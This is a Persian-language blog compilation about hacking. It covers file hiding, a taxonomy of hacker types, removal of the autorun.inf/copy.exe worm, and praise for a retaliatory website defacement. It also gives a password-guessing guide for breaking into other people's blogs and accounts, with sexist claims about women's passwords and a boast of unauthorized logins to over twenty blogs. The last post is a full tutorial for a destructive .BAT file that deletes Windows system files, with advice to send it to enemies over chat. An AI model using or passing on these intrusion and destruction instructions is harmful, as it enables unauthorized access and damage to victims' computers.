F:\Cross\Picture\PrivatePic
و نمیخواهید کسی این فایلها را ببیند.
کافیست در CMD فرمان زیر را بنویسید:
Attrib +h +s +r F:\Cross\Picture\PrivatePic\*.*

برای بازگردانی فایلهای مخفی شده هم کافیست فرمان بالا را به صورت زیر بنویسید:
Attrib -h -s -r F:\Cross\Picture\PrivatePic\*.*
به همین صورت فایلها دوباره ظاهر میشود.
توجه کنید *.* معنی "تمام فایلها با تمام فرمتها" را میدهد. یعنی اگر بزنید *.Jpg یعنی تمام فایلهایی که فرمت Jpg دارند و اگر بزنید Cross.* یعنی تمام فایلهایی که نام Cross دارند.
نکته بعدی اینکه فولدر ها با این روش مخفی نخواهند شد.

هرکس حداقل یک بار نام هک و هکر را شنیده است. اما هک چیست؟ هکر کیست؟

دقیقا مطلبی با همین نام قبلا در همین وبلاگ ثبت شده اما در این پست با این مقدمه میخواهیم هک و آموزش هک کردن را ارائه کنیم.

هکرها عموما چهار دسته هستند.

هکرهای کلاه سفید یا (White Hat Hacker Group) که هکرانی هستند حرفه ای و مجرب اما در راستای اهداف مثبت هک میکنند. مثلا به سایت شما نفوذ میکنند. یک زیر مجموعه و یا تغییر جزئی ایجاد میکنند و بعد بع شما میگویند که سایت شما فلان مشکل را دارد. سپس تغییراتی که ایجاد کرده اند را نشانتان خواهند داد و این هم مدرک...

هکرهای کلاه سیاه یا (Black Hat Hacker Group) که در واقع مانند دسته قبلی باهوش و حرفه ای هستند اما اهدافشان تخریب و آسیب رساندن است و نه کمک.

به این دسته Cracker هم گفته میشود. این دسته از هکرها ویروس مینویسند و باعث جلوگیری از فعالیت سرور و کلاینتها میشوند. حمله به سایتها و منابع و یا کامپیوترهای شخصی از اهداف این گروه است.

هکرهای کلاه خاکستری یا (Gray Hat Hacker Group) که به Whacker معروف اند.

این افراد به سیستم ها نفوذ میکنند و اطلاعات آنها را به سرقت میبرند. حال یا از این اطلاعات برای مقاصد بزرگ شخصی استفاده میکنند و یا آنها را منتشر میکنند. مثلا در سال 1994 یک واکر ژاپنی سایت ناسا را هک کرد و تمامی اطلاعات محرمانه آن را در سرتاسر اینترنت منتشر کرد.

هکرهای کلاه صورتی با (Pink Hat Hacker Group) در واقع کسانی هستند که فکر میکنند میتوانند اما نمیتوانند. کسانیکه با استفاده از چند نرم افزار میتوانند نفوذ کنند و تغییرات ایجاد کنند اما آنها فقط عامل هستند و همه ی کار را آن نرم افزار یا برنامه انجام میدهد.

من حتی کسانیکه هک های ساده و خنده دار انجام میدهند را جز این دسته قرار میدهم.

مثلا کسانیکه سرور کافی نت محلشان را هک میکنند و یا کسانیکه سرور گیم نت را تسخیر میکنند...

در این خصوص کمی توضیح دهم که در کافی نت ها و به خصوص گیم نت ها از FireWall استفاده نمیشود زیرا تنظیمات خاصی برای شبکه باید در Firewall ایجاد کنند و به همین دلیل راه انداز شبکه FireWall را بیخیال میشود تا کارش سخت نشود. همچنین Firewall ها در گیم نت بیشتر بازیها را بلوک میکنند و از همین رو در گیم نت اصلا از Firewall به صرف صاحب گیم نت نیست که استفاده کند.

ثانیا کسانیکه سرور را از کلاینت خودش مورد نفوذ قرار میدهند در واقع هکی به طول دو متر و از طریق سیم کلفت چند رشته ای انجام داده اند. واقعا شاهکار تر است اگر سرور اصلی را جلوی چشم مغازه دار از برق بکشید. هم ریسک بالاتری دارد و هم سخت تر است. آسیب بیشتری هم به شبکه میرسد.

نفوذ به سیستمها از طریق کلاینت خود آن سیستم در واقع هک به حساب نمی آید.

خوب. حالا کمی با هکرهای کلاه سیاه و کارهایشان باید بیشتر آشنا شویم.

برای شروع انواع ویروس و مخرب ها را توضیح میدهم.

امیدوارم تصویر سمت راست شما را کمی آشنا به این مطلب کرده باشد ولی به هر حال این آموزش از دو نظر اهمیت زیادی دارد. اولین مورد این است که وبلاگرها و وبمسترها حواسشان را بیشتر جمع میکنند و در امنیت وبلاگ و وبسایتشان شک میکنند و به فکر می افتند و دوم اینکه این یک آموزش ورود به وبلاگ ها و وبسایتهای دیگران است و حتی ID دیگران و به طور کلی بدست آوردن پسوردهای آنها.
روشی که معرفی میکنم بسیار ساده است و به فکر همه میرسد اما کمی بیشتر باید برای این کار وقت گذاشت.
دستورالعمل های زیر را برای بدست آوردن پسورد دیگران به کار ببرید. در اینجا به طور پیشفرض UserName ما مثلا از یک وبلاگ است و پسورد هم همان پسورد وبلاگ است.

وبلاگهای Multy User یا همان چند کاربره که نویسندگان زیادی دارد را با روشهای ساده ای میتوان وارد شد و تخریب کرد. دلیل اینکه Multy User را مثال میزنم این است که در این وبلاگها نویسندگان بیشتر اشتباه میکنند و دقت کمتری دارند.

1- کاربران مبتدی و عموما دختران از اعداد ردیفی استفاده میکنند. این اعداد معمولا 12345 و یا 123456789 است.
2- کاربران ممکن است دقیقا از همان UserName خود به عنوان پسورد هم استفاده کنند.
3- شناسه یا همان ID شخص بدون @yahoo.com میتواند به عنوان پسورد مورد استفاده قرار گیرد.
4- نام شخص به علاوه ی سال تولد به ایرانی یا انگلیسی میتواند پسورد باشد. مثال: ebi1990 یا ebi1369
5- نام کاربر ممکن است همان پسورد وی باشد اما به ندرت پیش می آید.
6- آدرس ایمیل گاهی اوقات به عنوان رمز عبور برگزیده میشود.
7- سال تولد به تنهایی ممکن است رمز عبور باشد.
8- کسانیکه نام کوتاه دارند که نمیشود به عنوان پسورد انتخاب کرد؛ گاهی اوقات دو بار نامشان را تکرار میکنند. مثال: AliAli
9- رمز ورود میتواند چند بار تکرار یک عدد باشد. که عموما تعداد آن پنج بار است. مثال: 11111 یا 00000
10- مورد 1 و 9 میتواند همراه با فشردن کلید ALT و بعد از نوشتن نام استفاده شود. یعنی مثلا بعد از نوشتن EBI کلید Alt را نگاه میداریم و اعداد موارد فوق را میزنیم که در مجموع یک کارکتر محسوب میشود.
11- تمام موارد فوق میتواند همراه با گرفتن Shift بکار گرفته شود و یا اولین حرف همراه با Shift باشد. مثال: CROSS یا Cross

تمامی موارد فوق بعد از آنالیز کردن تعداد زیادی پسورد به صورت Random نتیجه گیری شد و البته دقت کنید که موارد بالا فقط و فقط برای کاربران مبتدی و خانمها صدق میکند.
بعضی از کاربران حرفه ای هم از اینطور رابطه ها در پسورد استفاده میکنند ولی به قدری پیچیده رابطه ای را میسازند که بدست آوردن آن تقریبا غیر ممکن است.
این روشها توسط خودم در بیش از بیست وبلاگ به صورت تصادفی استفاده شده که بیشتر از 50 درصد جواب داده و البته در راه درست استفاده شده و در اکثر موارد مدیریت وبلاگ متوجه ورود بدون اجازه نشده و مشکلی بوجود نیامده.
موفق باشید.

اخیرا ویروسها و تروجانهایی شایع شده است که یا Folder Option را حذف میکند و یا باعث میشود فایلهایی که مخفی کرده اید دیگر نمایش داده نشوند و کلا مشکلاتی که اساس آنها Folder Option و مشکلات فایلهای Hidden است بوجود می آید.
این مقاله که از سایت P30world.com کپی شده است با کمی اصلاح در خدمت شماست تا تمامی این ویروسها را بتوانید رفع کنید.

حالا از کجاها بفهمیم که کامیپوتر ما ویروس گرفته است.

موقعي که شما وارد My Computer مي شويد و روي درايو هاي آن راست کليک مي کنيد و در اين هنگام يک گزينه با يک زبان نامفهوم را مي بينيد.
یا اینکه وقتی روی درایو هایتان دو بار کلیک می کنید محتوای درایو های شما در یک صفحه جدید باز می شود .
یا موقع دابل کلیک کردن روی درایو هایتان پنجره Open With باز می شود و به شما می گوید Choose the program you want to use to open this file یا هنگام کلیک بر روی درایو هایتان error  به شما داده می شود .
گاهی اوقات هم زمانیکه روی درایوهایتان راست کلیک میکنید گزینه ی Auto Run دیده میشود.

این موارد نشان میدهد که یعنی سیستم شما ویروسی شده است. این ویروس، ویروس autorun.inf می باشد. نحوه پاک کردن این ویروس را در قسمت پایین توضیح میدهم.
همچنين اين ويروس باعث از بين رفتن و پاک شدن Folder Options خواهد شد.
و اگر شما گزينه هاي Show hidden files and folders و Hide protected operating system files (Recommended) را مارک دار کنيد با ok کردن پنجره اين گزينه کار نخواهند کرد . و دوباره به حالت اوليه باز خواهند گشت.
همچنين اين ويروس باعث غير فعال شدن Task Manageو Registry Editor خواهد شد .
اگر شما روي گزينه command prompt يا cmd نيز کليک کنيد يا باز نخواهد شد و پيغام زير را خواهد داد يا اينکه به سرعت باز و بسته خواهد شد .
the command prompt has been disabled by your administrator
راههاي ورود اين ويروس از طريق قطعاتي خواهد بود که از طريق USB با سيستم شما ارتباط دارند . قطعاتي مانند فلش مموري ها ( کولديسک ) ، موبايل ها ، رم ريدر ها و ...

نحوه از ببن بردن ویروس autorun.inf

روش اول :
ابتدا وارد My Computer شوید.
بعد از مشاهده لیست درایوها از نوار بالا بروی گزینه Tools کلیک کرده سپس گزینه Folder Options را انتخاب کنید
در پنجره جدید باز شده گزینه View را انتخاب کنید و بروی گزینه Show hidden files and folders کلیک کنید تا دایره آن توپر شود .
کمی پایینتر تیک گزینه Hide Protected Operating System Files را بر دارید.حالا ok کنید
سپس با راست کلیک کردن و زدن open وارد درایو هایتان شوید
(حتما یادتون باشه با راست کلیک کردن و زدن open وارد درایو هایتان شوید اگر دوبار روی درایوی کلیک کنید باز هم ویروس فعال خواهد شد و دوباره همه چیز به حالت اول بر خواهد گشت . پس حتما با راست کلیک کردن و زدن open وارد درایوهایتان شوید(
سپس دنبال یک فایل به نام autorun.inf بگرید و ان را پاک کنید برای همه درایو ها این کار را انجام بدید .
بعد از این کار بلافاصله بدون هیچ معطلی سیستم خودتون را ریستارت کنید . یادتون نره حتما حتما بدون انجام هیچ کاری سیستم را ریستارت کنید .

روش دوم :
ابتدا با زدن کلید F8 سیستم را در حالت safe mode راه اندازی کنید و سپس از منوی استارت گزینه run را بزنید و سپس داخل ان cmd را تایپ کنید و ok بزنید .
عبارات زیر را یکی یکی نوشته و enter بزنید . این کار را برای تمامی درایو ها انجام دهید .
del x:/autorun.inf \a:h
del x:/autorun.inf \a:r
del x:/autorun.inf \a:s
به جای x باید نام درایوها را بنویسید .

روش سوم :
copy.exe تروجانی است که گاهی اوقات در تمامی درایو های شما قرار میگیره و با هر بار کلیک بر روی درایو ها فایل autorun.inf فایل این فایل را اجرا می کند.
یکی از روشهای پاک کردن این ویروس این است که ابتدا شما باید پروسه های temp1.exe و temp2.exe رو از بین ببرید . برای این کار ابتدا باید سیستم را به صورت safe mode راه اندازی کنید .
شما نباید روی درایو ها یتان دابل کلیک کنید چون با این کار ویروس autorun.inf که در درایو هایتان قرار دارد باعث فعال شدن پروسه های temp1.exe و temp2.exe می شود.
بعد از راه اندازی سیستم به صورت safe mode شما باید با راست کلیک کردن و زدن گزینه open وارد درایو c ویندوز شده و به پوشه windows و بعد هم پوشه system32 رفته و دو فایل temp1.exe و temp2.exe را حذف کنید.
البته در بعضی از نسخه های ویروس copy.exe ویروس autorun.inf حتی درون پوشه %win% هم وجود داره بنابراین حتما حتما برای ورود به درایوها پوشه ها را با راست کلیک باز کنید.
نکته: قبل از اینکار باید ابتدا این پروسه ها را از Task Manager پاک کنید. برای این کار با زدن کلید های ترکیبی ctrl + alt + delete وارد Task Manager بشید و پروسه های temp1.exe و temp2.exe را از لیست processes با کلیک بر روی انها و زدن end process حذف کنید.
ویروس autorun.inf با هر بار فعال شدن موجب میشود که دو فایل xcopy.exe و host.exe درون همان درایو فعال بشوند و دوباره دو فایل temp1.exe و temp2.exe را بسازند.
شما نباید فایل های xcopy.exe را با فایل های خود windows که درون پوشه ی system32 هستند اشتباه بگیرید.
برای تشخیص ویروس xcopy.exe و فایل xcopy.exe که در پوشه system32 است باید از حجم انها این دو را شناسایی کرد اگر فایل xcopy.exe حجمی معادل 32 کیلو بایت داشت مربوط به خود ویندوز می باشد در غیر این صورت ویروس خواهد بود.
حالا فایلهای سیستمی را مانند روش اول از حالت هایدن خارج کنید و ویروس autorun.inf را پاک کنید و بعد هم به درایوهای خودتون نگاه کنید اگر فایلهایی با عنوان xcopy.exe وhost.exe بودند با خیال راحت پاک کنید.

نحوه پاک کردن ویروس Copy.exe

اسامی دیگر این ویروس host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe,Salga-A worm
این ویروس یکی از خطرناک ترین ویروس ها هست که به عنوان یک پروسه در سیستم شروع به فعالیت و انتشار خودش می کنه و با توجه به اینکه بعضی از انتی ویروسها به صورت نامناسب این ویروس را پاک می کنند باعث نمایش یک پیغام در زمان دابل کلیک کردن روی درایو و یا فولدر در محیط ویندوز می شوند.
برای پاک کردن دستی این کرم شما باید ابتدا همه پروسه هایی که با نام های host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe,Salga-A worm هستند را پیدا کنید و آنها را پاک کنید .

تذکر: مواظب باشید این فایلها را با فایلهای اساسی سیستم عامل اشتباه نگیرید .

مهم :یکی از دلایل اصلی به وجود امدن این مشکل ویروس Autorun.inf هست که شما باید طبق روش هایی که در اموزش گفته ام ان را پاک کنید . این کار را حتما انجام دهید . یعنی حتما باید ابتدا ویروس Autorun.inf را طبق اموزش باید از بین ببرید.
سپس به این آدرس در رجیستری رفته و اگر کلیدی به اسم Copy.exe در زیر منوی MountPoints2 وجود داشت آن را پاک کنید.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

با این برنامه به طور کامل می توانید این ویروس را از بین ببرید .
http://www.securitystronghold.com/download/solutions/TrueSword4.exe

این موضوع بر میگرده به تقریبا چند ماه پیش ولی به دلیل جذابیت این رو از اون زمان نقل میکنم. تو یک سایت که هواداران نانسی اجرم درست کرده بودند؛ کلمات ضد ایرانی نوشته شده بود.

آدرس این سایت www.nancyajram.com بود و همه فکر میکردند که این سایت رسمی خود نانسی هست.

در صفحه اول مهمانان این سایت نوشته شده بود؛ ورود ایرانی های ... ممنوع.

چند روز بعد، یک هکر خوش ذوق ایرانی با هک کردن این سایت قدرت و نفوذ کاربران ایرانی را ثابت کرد.

در زیر عکسی دقیقا از همان نقطه که عربها کلمات ضد ایرانی نوشته بودند است ولی بعد از هک شدن:برای دیدن عکس بزرگ روی این عکس کلیک کنید.

ترجمه: سوسمار خورها؛ این آخرین بار باشه که میبینم مانع ورود ایرانیان میشوید. باشه؟ اگر این فیلتر را بر ندارید من شروع به هک و ... وبسایت شما میکنم.

البته چند روز بعد، نانسی اجرم رسما از ایرانی ها عذرخواهی کرد و در وبسایت شخصی خود این موضوع را عنوان کرد و گفت که آن سایت مال من نبوده و هواداران من این اشتباه را کرده اند.

شواهد صحت حرف نانسی را نشان میداد و سایت شخصی نانسی آدرس دیگری دارد.

نمونه های اینطور دفاع کردن ها توسط هکران توانمند ایرانی بسیار است و نمونه های آن قبلا در همین وبلاگ بیان شده است.

معمولا مردم ما با شنیدن نام هکر به یاد خرابکارهایی می افتند که با اعمالشان یک شرکت و یا یک سازمان را بهم میریزند و با نفوذ به رایانه ها قصد خرابکاری دارند.

ولی اینطور نیست. هکر واقعی هیچ وقت به سایت یا شبکه ای آسیب نمی رساند. هکر هیچ قصد بدی از نفوذ ندارد. هکرها در یک رایانه یا سایت و شبکه نفوذ میکنند تا ضعف آن شبکه را نشان دهند و هدف آنها افزایش سطح امنیت میزبان است. به این صورت که هکر با هک کردن مثلا یک سایت، مشکل را متوجه میشود و به صاحب سایت گزارش میکند تا آن سایت دیگر از آن راه ضربه نخورد. در اصطلاح به این افراد سامورایی میگویند. برای نمونه؛ گروه امنیتی آشیانه با حمله به بیش از صد سایت ایرانی، ضعف آنها را نشان دادند ولی هیچ اختلالی در کار سایتها پیش نیامد و گروه به صورت رایگان با درخواست مدیران سایتها که اغلب هم سایتهای بزرگی بودند، شروع به ارتقا امنیت آنها کردند.

ولی واکر (Wacker) در رایانه نفوذ میکند ولی گزارشی نمیدهد و از این راه از اطلاعات سیستم میزبان استفاده میکند. هکر نفوذ را انجام میدهد و به اصطلاح جاسوسی (Spy) میکند. این دسته جزو هکرهای کلاه سیاه هستند.

کراکر ها (Cracker) در سیستم نفوذ میکنند ولی نه گزارش میدهند و نه از اطلاعات استفاده میکنند و قصدشان فقط خرابکاری است. این نوع حمله که کرک کردن نام دارد معمولا اهدافی سیاسی، مذهبی، امنیتی و کمتر شخصی دارد که افرادی که این کار را میکنند جزو هکرهای کلاه سیاه می باشند. گروه امنیتی آشیانه 100 سایت اسرائیلی و تقریبا 500 سایت بزرگ دانمارکی را Crack کردند که این کار در پاسخ به اعمال مشابه آنها بود.

و اما پریکر (Preaker) کسی است که از رایانه استفاده نمیکند و نیازی به آن هم ندارد. پریکرها کسانی هستند که استراق سمع میکنند و یا با خطوط تلفن مجانی صحبت میکنند. این افراد از کارشان سود شخصی می برند و خطر زیادی برای اشخاص ندارند ولی اگر این کارها را به بقیه آموزش دهند میتواند برای جامعه مضر باشد.

مطالب زیر شاید صد در صد عمل نکند:

اگر دوست دارید حال کسی را به صورت اساسی بگیرید فقط کافی است از ویندوز و DOS کمک بخواهید.

بهترین روش مردم آزاری رایانه ای این است فایلهای اساسی یک سیستم را حذف کنید تا اینکه در کار ویندوز اختلال ایجاد شود.

اما چطوری؟ Notepad را باز کنید و بنویسید Echo off و Enter بزنید تا برسید به خط بعد. حالا بنویسید Del و یک فاصله بزنید و مسیر پوشه های مهم طرف مقابل یا مثلا محل پوشه های ویندوزی طرف را بنویسید. مانند نمونه زیر:

Del D:\windows\system32\*.*/q

عبارت *.* به معنی هر فایل با هر پسوند میباشد. یعنی اگر بزنید *.MP3 یعنی هر فایل MP3 با هر نامی که باشد.

/q را باید به آخر عبارتها اضافه کنید تا دستور Delete خودکار اجرا شود.

نمونه زیر را در Notepad بنویسید. به این وسیله سیستم طرف مقابل تقریبا از کار می افتد و یا اگر ویندوزش سالم ماند؛ دائما پیامهای Error ظاهر میشود.

echo off

del D:\WINDOWS\Cursors\*.*/q

del D:\WINDOWS\Fonts\*.*/q

del D:\WINDOWS\Prefetch/q

del D:\WINDOWS\system32\*.cpl/q

del D:\WINDOWS\system32\*.bat/q

del D:\WINDOWS\system32\*.com/q

del D:\WINDOWS\system32\*.dat/q

del D:\WINDOWS\system32\*.scr/q

del D:\WINDOWS\*.ini/q

del D:\Program Files\Windows Media Player\*.*/q

del D:\Program Files\Internet Explorer\*.*/q

del D:\WINDOWS\Temp\*.*/q

del D:\WINDOWS\system32\*.msc/q

del D:\WINDOWS\system32\*.nls/q

بعد از نوشتن هرکدام از مسیرها Save as را از منوی File بزنید و با نام Cross.BAT ذخیره کنید. نام Cross را میتوانید تغییر دهید ولی توجه کنید که هر اسمی که روی فایل گذاشتید، .BAT را باید در آخر آن اضافه کنید.

حالا فایل شما آماده است. به هیچ وجه آن را برای خودتان تست نکنید. ولی اگر میخواهید ویندوز عوض کنید و یا عوض کردن ویندوز را بلدید، روی فایل کلیک کنید تا مطمئن شوید که کار میکند.

خطهای آبی اگر به کار گرفته شوند؛ فقط حال طرف را میگیرند ولی مشکل جدی ایجاد نمیکنند.

خطهای قرمز اگر به کار گرفته شوند؛ فقط سرعت رایانه تا چند روز کم میشود و به هیچ وجه مشکلی ایجاد نمیکنند و خود به خود و به مرور زمان درست میشود.

خطهای سبز اگر به کار روند باعث اختلال در کار ویندوز و از کار افتادن آن میشود.

نکته: مراقب باشید که اشتباها روی فایل کلیک نکنید. شاید صد در صد تمام مسیرهای بالا را حذف نکند ولی مطمئن باشید اختلالات بزرگی در ویندوز ایجاد میکند.

ترفند: فایل را میتوانید از طریق یاهو و در چت برای دشمنان خود بفرستید.

عبرت: اگر فایلی با پسوند .BAT از کسی گرفتید حتما از سالم بودن آن مطمئن شوید. (از ماست که برماست)

توجه: هرکدام از مسیرهای بالا برای یک فایل است و به کار بردن تمام آنها در یک فایل روش دیگری دارد. یعنی پس از نوشتن Echo off فقط یک خط اضافه کنید. هرکدام را که از لیست بالا می پسندید.